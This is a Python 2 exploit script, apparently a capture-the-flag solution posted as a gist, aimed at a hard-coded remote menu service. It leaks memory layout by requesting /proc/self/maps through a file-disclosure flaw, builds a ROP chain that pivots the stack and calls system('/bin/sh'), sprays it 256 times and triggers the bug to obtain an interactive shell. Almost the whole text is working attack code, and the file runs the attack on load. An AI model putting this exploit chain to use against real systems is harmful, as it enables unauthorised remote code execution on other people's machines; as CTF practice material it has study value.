@peternguyen93
Created September 21, 2015 02:38
#!/usr/bin/python
from Pwn import *
import re
def add_skeleton(skeleton):
    """Submit one "skeleton" message through the service's `m` menu option.

    Waits for the menu (its last entry is the ANSI-coloured "[q]uit"),
    selects `m`, waits for the message prompt and sends `skeleton` encoded
    with the Python 2 'base64' codec (whose output is newline-terminated).

    Returns True when the service's acknowledgement text is present in the
    data read back, False otherwise.  Uses the module-global connection `p`
    that exploit() creates.
    """
    menu_end = '\x1b[0;31;49m[q]\x1b[0muit'
    ack = 'im going to steal all ur calcuims'

    p.read_until(menu_end)
    p.write('m\n')
    p.read_until('so... what do you say to mr skeletal?\n')
    p.write(skeleton.encode('base64'))
    reply = p.read_until(ack)
    return ack in reply
def add_meme():
    """Select the service's `n` menu option once the menu has been printed.

    Takes no input and returns nothing.  What `n` creates on the server side
    is not visible from this script (the function name suggests a "meme"
    entry).  Uses the module-global connection `p`.
    """
    menu_end = '\x1b[0;31;49m[q]\x1b[0muit'
    p.read_until(menu_end)
    p.write('n\n')
def getBaseAddress():
    """Read the target's memory map through the `p` (print receipt) option.

    The "order number" sent is the base64 of the path /proc/self/maps, and
    the reply is scanned for `start-end` hex ranges.  If the service really
    answers with that file, the order number is being used as a file path
    without restriction -- a file-disclosure flaw that reveals the ASLR
    layout of the process.

    Returns (libc_base, heap_base) as integers.

    NOTE(review): the indices 10 and 199 are tied to the exact reply the
    author saw.  The pattern also matches hyphens inside permission flags
    and file names, so the positions do not correspond to line numbers and
    will differ on any other build or layout.
    """
    menu_end = '\x1b[0;31;49m[q]\x1b[0muit'
    order = '/proc/self/maps'.encode('base64')

    p.read_until(menu_end)
    p.write('p\n')
    p.read_until('ok, let me know your order number bro:')
    p.write(order)
    maps_text = p.read_until('rint receipt from confirmation number')

    # Every "<hex>-<hex>" fragment in the reply; the left half is a start address.
    ranges = re.findall(r'([0-9a-f]*\-[0-9a-f]*)', maps_text)
    heap_base = int(ranges[10].split('-')[0], 16)
    libc_base = int(ranges[199].split('-')[0], 16)
    return libc_base, heap_base
# 0x00000000000b25d5 : add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
# 0x0000000000022b1a : pop rdi ; ret
# 0x000000000001f7a6 : pop rdi ; pop rbp ; ret
def exploit():
    """Run the whole sequence against the hard-coded remote service.

    Steps, in order:
      1. connect and publish the connection as the module-global `p`;
      2. read the libc and heap base addresses via getBaseAddress();
      3. build a 280-byte payload: six packed addresses (annotated below)
         padded with 'C';
      4. select `n` once, then submit the payload 256 times with `m`;
      5. select `c`, which the author marks as the trigger, and hand the
         session over to `p.io()`.

    Returns 1 if one of the 256 submissions is not acknowledged, otherwise
    None.  All offsets and `heap_offset` are hard-coded, so they only fit
    the libc build and heap layout the author targeted; the vulnerable code
    itself is not part of this script.
    """
    global p

    # Offsets into libc, with the author's annotations.
    pop_rdi_pop_rbp = 0x1f7a6  # pop rdi ; pop rbp ; ret - skipped once the stack is changed
    pivot = 0xb25d5            # add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
    pop_rdi = 0x22b1a          # pop rdi ; ret
    bin_sh = 0x17ccdb          # "/bin/sh"
    system = 0x46640           # system

    # Fixed offset added to the heap base (the original had commented-out
    # `start_offset = 0x10` / `start_offset+=280` lines next to it).
    heap_offset = 233930608

    # The original also carried a commented-out Pwn(mode=1,port=8888) variant.
    p = Pwn(mode=1,host='52.3.190.202',port=1337)
    p.connect()

    libc_base, heap_base = getBaseAddress()
    print '[+] Libc base:', hex(libc_base)
    print '[+] Heap base:', hex(heap_base)

    payload = ''
    payload += pA([
        libc_base + pop_rdi_pop_rbp,
        libc_base + pivot,
        heap_base + heap_offset,  # don't care
        libc_base + pop_rdi,
        libc_base + bin_sh,
        libc_base + system,
    ])
    payload += 'C' * (280 - len(payload))  # pad to 280 bytes

    add_meme()
    for attempt in xrange(1, 257):
        print 'Add skeleton', attempt
        if add_skeleton(payload):
            continue
        print 'Failed'
        return 1

    p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
    p.write('c\n')  # trigger bug
    p.io()
# Module-level call: executing (or importing) this file starts exploit()
# immediately, which connects to the host hard-coded inside it.
exploit()